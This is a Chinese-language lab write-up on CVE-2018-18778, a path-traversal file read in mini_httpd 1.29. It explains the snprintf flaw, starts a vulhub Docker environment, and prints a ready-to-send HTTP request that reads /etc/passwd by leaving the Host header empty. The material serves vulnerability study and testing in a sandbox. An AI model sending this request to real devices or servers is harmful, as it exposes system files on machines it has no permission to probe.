漏洞简介
Mini_httpd是一个微型的Http服务器,在占用系统资源较小的情况下可以保持一定程度的性能(约为Apache的90%),因此广泛被各类IOT(路由器,交换器,摄像头等)作为嵌入式服务器。而包括华为,zyxel,海康威视,树莓派等在内的厂商的旗下设备都曾采用Mini_httpd组件。
在mini_httpd开启虚拟主机模式的情况下,用户请求http://HOST/FILE将会访问到当前目录下的HOST/FILE文件。
(void) snprintf( vfile, sizeof(vfile), "%s/%s", req_hostname, f );
见上述代码,分析如下:
- 当HOST=
example.com、FILE=index.html的时候,上述语句结果为example.com/index.html,文件正常读取。 - 当HOST为空、FILE=
etc/passwd的时候,上述语句结果为/etc/passwd。
后者被作为绝对路径,于是读取到了/etc/passwd,造成任意文件读取漏洞。
环境搭建
执行如下命令启动mini_httpd 1.29:
(root💀guiltyfet)-[/home/guiltyfet/vulhub/mini_httpd] └─# cd CVE-2018-18778 ┌──(root💀guiltyfet)-[/home/guiltyfet/vulhub/mini_httpd/CVE-2018-18778] └─# docker-compose up -d Creating network "cve-2018-18778_default" with the default driver Pulling web (vulhub/mini_httpd:1.29)... 1.29: Pulling from vulhub/mini_httpd 61be48634cb9: Pull complete fa696905a590: Pull complete be37244639af: Pull complete 1a50d92daf1a: Pull complete Digest: sha256:14536977b28d9ef67df67bda62dec54b76bc756460bbd0b0786feabf69ff7535 Status: Downloaded newer image for vulhub/mini_httpd:1.29 Creating cve-2018-18778_web_1 ... done ┌──(root💀guiltyfet)-[/home/guiltyfet/vulhub/mini_httpd/CVE-2018-18778] └─#
环境启动后,访问http://127.0.0.1:8080即可看到Web页面。
漏洞复现
发送请求是将Host置空,PATH的值是文件绝对路径:
GET /etc/passwd HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: hblid=OCkAkPEOWHj8QX5o3m39N0H02BOA0I12; olfsk=olfsk8528760320823083; ECS[visit_times]=1; mage-cache-storage=%7B%7D; mage-cache-storage-section-invalidation=%7B%7D; mage-messages=; recently_viewed_product=%7B%7D; recently_viewed_product_previous=%7B%7D; recently_compared_product=%7B%7D; recently_compared_product_previous=%7B%7D; product_data_storage=%7B%7D; section_data_ids=%7B%22cart%22%3A1638415333%2C%22customer%22%3A1638415332%2C%22compare-products%22%3A1638415332%2C%22product_data_storage%22%3A1638415332%2C%22last-ordered-items%22%3A1638415332%2C%22directory-data%22%3A1638415332%2C%22instant-purchase%22%3A1638415332%2C%22review%22%3A1638415332%2C%22wishlist%22%3A1638415332%2C%22recently_viewed_product%22%3A1638415332%2C%22recently_compared_product%22%3A1638415332%2C%22paypal-billing-agreement%22%3A1638415332%7D; mage-cache-sessid=true; private_content_version=e48e945c4e066c5afa30b51edd7c4541 Upgrade-Insecure-Requests: 1 Pragma: no-cache Cache-Control: no-cache
如果没有cookie,session等值会显示UNKNOWN 408 Request Timeout
